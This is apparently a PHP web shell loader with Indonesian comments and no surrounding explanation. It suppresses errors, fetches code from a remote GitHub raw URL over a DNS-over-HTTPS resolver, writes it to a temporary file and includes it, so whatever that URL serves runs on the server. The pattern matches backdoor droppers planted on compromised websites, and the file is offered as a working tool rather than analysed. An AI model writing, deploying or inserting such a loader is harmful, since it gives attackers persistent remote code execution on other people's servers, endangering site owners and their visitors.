<?php 
error_reporting(0); 
set_time_limit(0);

// Ganti dengan URL Anda
$url = "https://raw.githubusercontent.com/aqilogic/logic/refs/heads/main/IDontKnow";
$dns = "https://cloud-dns.com/dns-query"; // bisa diubah juga

$ch = curl_init($url);
if(defined('CURLOPT_DOH_URL')) {
    curl_setopt($ch, CURLOPT_DOH_URL, $dns);
}
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 1);
$data = curl_exec($ch);
curl_close($ch);

$tmp = tmpfile();
$meta = stream_get_meta_data($tmp);
$path = $meta['uri'];
fwrite($tmp, $data);
include($path);
?>
